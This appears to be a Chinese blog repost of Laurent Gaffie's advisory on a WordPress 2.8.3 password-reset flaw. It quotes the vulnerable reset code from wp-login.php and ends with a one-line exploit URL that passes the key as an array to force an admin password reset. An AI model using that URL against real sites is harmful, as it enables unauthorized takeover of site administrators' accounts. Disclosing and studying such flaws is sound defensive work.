WordPress2.83管理员密码重置漏洞

Wordpress2.8.3管理员密码漏洞

作者:Laurent Gaffie
WordPress中处理密码重置的方式看起来像这样：您通过这个形式递交您的电子邮件或用户名/wp-login.php?action=lostpassword ;而WordPress会发送一封电子邮件来确认密码重置。
“Someone has asked to reset the password for the following site and username.http://DOMAIN_NAME.TLD/wordpress Username: admin To reset your password visit the following address, otherwise just ignore this email and nothing will happen
http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag ”
你点击链接，然后重设您的WordPress的管理员密码。
wp-login.php：

 function reset_password($key) {
    global $wpdb;
 
    $key = preg_replace(‘/[^a-z0-9]/i’, ”, $key);
 
    if ( empty( $key ) )
        return new WP_Error(‘invalid_key’, __(‘Invalid key’));
 
    $user = $wpdb->get_row($wpdb->prepare(“SELECT * FROM $wpdb->users WHERE user_activation_key = %s”, $key));
    if ( empty( $user ) )
        return new WP_Error(‘invalid_key’, __(‘Invalid key’));

 $action = isset($_REQUEST['action']) ? $_REQUEST['action'] : ‘login’;
$errors = new WP_Error();
 
if ( isset($_GET['key']) )
    $action = ‘resetpass’;
 
// validate action so as to default to the login screen
if ( !in_array($action, array(‘logout’, ‘lostpassword’, ‘retrievepassword’, ‘resetpass’, ‘rp’, ‘register’, ‘login’)) && false === has_filter(‘login_form_’ . $action) )
    $action = ‘login’;

break;
 
case ‘resetpass’ :
case ‘rp’ :
    $errors = reset_password($_GET['key']);
 
    if ( ! is_wp_error($errors) ) {
        wp_redirect(‘wp-login.php?checkemail=newpass’);
        exit();
    }
 
    wp_redirect(‘wp-login.php?action=lostpassword&error=invalidkey’);
    exit();
 
break;
你能绕过第一步，从而可以随意进行重置管理员密码。利用方法：http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=密码将被重置，而不需要任何的确认信息

收藏、分享这篇文章!

Tags: wp技巧